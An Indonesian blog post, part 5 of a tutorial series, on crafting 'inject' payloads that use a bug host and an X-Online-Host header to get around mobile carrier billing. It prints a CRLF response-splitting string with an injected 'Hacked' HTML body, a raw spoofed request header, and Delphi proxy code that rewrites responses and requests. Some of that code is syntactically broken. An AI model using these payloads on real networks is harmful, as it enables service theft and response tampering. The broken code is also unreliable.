Sabtu, 25 April 2015

Cara Membuat Payload Redirect 301 Tutorial Bagian 5

Kali ini Saya mau berbagi Tips lagi seputar Cara Membuat Payload Redirect 301 Tutorial Bagian 5 dan sebelumnya juga saya sudah berikan info seputar Cara Belajar Deface Website Dengan Web Goat Bagian Pertama 2015 ok silahkan langsung simak saja video tutorialnya dibawah ini...

Cara Membuat Payload Inject Injek 2015

1. http://atsameip.intercode.ca/ ... Cari Bug Host
2. http://www.requestmaker.com/ ... Methode Test (Body Harus Respone)
3. http://www.timeanddate.com/calendar/
4. http://127.0.0.1/WebGoat/attack (Session Proxy Test)
5. Standar Session For Redirect 301 (Respone Header Test):

http://m.berniaga.com%0d%0aen%0d%0a
Content-Length: 0%0d%0a
HTTP/1.1 301 Moved Permanently%0d%0a
Content-Type: text/html%0d%0a
Last-Modified: Sun, 4 Oct 2015 20:16:09 GMT%0d%0a
Content-Length: 178%0d%0a
<html>Hacked Taziex City</html>%0d%0a%0d%0a

6. Request Header (Bahan Payload);

POST / HTTP/1.1%0d%0a
Host: m.berniaga.com%0d%0a
Accept: */*%0d%0a
Connection: keep-alive%0d%0a
X-Online-Host: http://m.olx.co.id/%0d%0a%0d%0a

7. Respone Header (Bahan Replace);

HTTP/1.1 301 Moved Permanently

8. Konsep Memasukan Replace Ke Data Asli (OutboundData);

procedure TForm1.Client_RequestTCPOutboundData(AThread: TIdMappedPortThread);
var header: string;
begin
if (Pos('HTTP/1.1 301 Moved Permanently',AThread.NetData)<>0) then begin
Header:= StringReplace(AThread.NetData,'HTTP/1.1 301 Moved Permanently','HTTP/1.1 200 OK',[rfReplaceAll, rfIgnoreCase]);
end;

9. Konsep Memasukan Data Payload ke Data Asli (Execute);

procedure TForm1.IdMappedPortTCP1Execute(AThread: TIdMappedPortThread);
var request: string;
begin
if (Pos('CONNECT ''HTTP/1.0',AThread.NetData)<>0) then begin
Request := ('POST http://m.berniaga.com/HTTP/1.1'+%0d%0a'Host: m.berniaga.com'+%0d%0a'Accept: */*'+%0d%0a'Connection: keep-alive'+%0d%0a'X-Online-Host: http://m.olx.co.id/'+%0d%0a%0d%0a);
end;

Itulah Payload Dasarnya,,, Bagaimana agar pilot tsb bisa digunakan, ditunggu saja pada video selanjutnya........... Bersambung... ke Bagian 6........

Video Tutorial Dasar Buat Pilot 301 Moved Permanently

 

Hanya itu saja info yang bisa di share kali ini seputar Cara Membuat Payload Redirect 301 Tutorial Bagian 5 semoga bermanfaat dan terima kasih,, Good Luck... untuk bagian yang ke 6 KLIK DISINI

Postingan yang mungkin ingin anda baca; Diagram Execute Sederhana Untuk Injek Delphi 7 All Operator 2015